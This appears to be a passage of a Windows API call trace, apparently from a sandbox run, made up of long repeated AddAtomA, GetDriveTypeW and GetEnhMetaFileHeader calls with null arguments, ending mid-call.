[0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.794] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.794] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) 
returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.795] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.795] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.796] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.796] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.797] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.797] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) 
returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.798] AddAtomA (lpString=0x0) returned 0x0 [0107.798] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.799] AddAtomA (lpString=0x0) returned 0x0 [0107.799] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.800] AddAtomA (lpString=0x0) returned 0x0 [0107.800] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.801] AddAtomA (lpString=0x0) returned 0x0 [0107.801] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) 
returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.802] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.802] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.803] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.803] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.804] AddAtomA (lpString=0x0) returned 0x0 [0107.804] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.805] AddAtomA (lpString=0x0) returned 0x0 [0107.805] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.805] AddAtomA (lpString=0x0) returned 0x0 [0107.805] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.805] AddAtomA (lpString=0x0) returned 0x0 [0107.805] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.805] AddAtomA (lpString=0x0) returned 0x0 [0107.805] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.805] AddAtomA (lpString=0x0) returned 0x0 [0107.805] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.805] AddAtomA (lpString=0x0) returned 0x0 [0107.805] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.854] AddAtomA (lpString=0x0) returned 0x0 [0107.854] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.854] AddAtomA (lpString=0x0) returned 0x0 [0107.854] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.854] AddAtomA (lpString=0x0) returned 0x0 [0107.854] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.855] AddAtomA (lpString=0x0) returned 0x0 [0107.855] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.855] AddAtomA (lpString=0x0) returned 0x0 [0107.855] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.855] AddAtomA (lpString=0x0) returned 0x0 [0107.855] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.855] AddAtomA (lpString=0x0) returned 0x0 [0107.855] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.855] AddAtomA (lpString=0x0) 
returned 0x0 [0107.855] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.855] AddAtomA (lpString=0x0) returned 0x0 [0107.855] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.855] AddAtomA (lpString=0x0) returned 0x0 [0107.855] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.855] AddAtomA (lpString=0x0) returned 0x0 [0107.855] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.855] AddAtomA (lpString=0x0) returned 0x0 [0107.855] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.855] AddAtomA (lpString=0x0) returned 0x0 [0107.855] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.856] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 